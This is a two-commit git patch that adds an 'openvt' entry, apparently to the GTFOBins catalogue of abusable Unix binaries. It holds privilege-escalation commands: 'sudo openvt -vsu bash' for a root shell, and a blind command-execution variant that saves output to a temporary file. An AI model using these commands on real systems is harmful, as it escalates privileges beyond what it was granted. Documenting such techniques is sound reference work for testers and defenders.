From 4347f58f55e7cc1486e44a5560fd261137c01b53 Mon Sep 17 00:00:00 2001
From: Mohit Khemchandani <42883046+mohitkhemchandani@users.noreply.github.com>
Date: Tue, 19 Jan 2021 23:07:21 +0530
Subject: [PATCH 1/2] Added openvt.md

---
 _gtfobins/openvt.md | 7 +++++++
 1 file changed, 7 insertions(+)
 create mode 100644 _gtfobins/openvt.md

diff --git a/_gtfobins/openvt.md b/_gtfobins/openvt.md
new file mode 100644
index 0000000..7c87772
--- /dev/null
+++ b/_gtfobins/openvt.md
@@ -0,0 +1,7 @@
+---
+functions:
+  sudo:
+    - description: If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.
+      code: |
+        sudo openvt -vsu bash
+---

From 717acf4b146a123570bfb3377f902b27cd325cc7 Mon Sep 17 00:00:00 2001
From: Andrea Cardaci <cyrus.and@gmail.com>
Date: Thu, 21 Jan 2021 14:49:32 +0100
Subject: [PATCH 2/2] Fix openvt

---
 _gtfobins/openvt.md | 7 +++++--
 1 file changed, 5 insertions(+), 2 deletions(-)

diff --git a/_gtfobins/openvt.md b/_gtfobins/openvt.md
index 7c87772..2d63a81 100644
--- a/_gtfobins/openvt.md
+++ b/_gtfobins/openvt.md
@@ -1,7 +1,10 @@
 ---
 functions:
   sudo:
-    - description: If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.
+    - description: The command execution is blind (displayed on the virtual console), but it is possible to save the output on a temporary file.
       code: |
-        sudo openvt -vsu bash
+        COMMAND=id
+        TF=$(mktemp -u)
+        sudo openvt -- sh -c "$COMMAND >$TF 2>&1"
+        cat $TF
 ---